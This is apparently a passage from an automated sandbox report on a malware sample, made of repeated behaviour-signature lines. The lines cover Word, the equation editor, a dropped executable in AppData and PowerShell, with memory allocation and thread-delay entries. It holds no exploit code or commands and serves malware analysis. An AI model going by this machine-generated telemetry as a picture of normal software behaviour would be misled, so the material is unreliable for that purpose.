                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 21B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 3E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 5740000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 6740000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 6880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 7880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 3D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 23B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: 780000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3765Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3545Jump to behavior
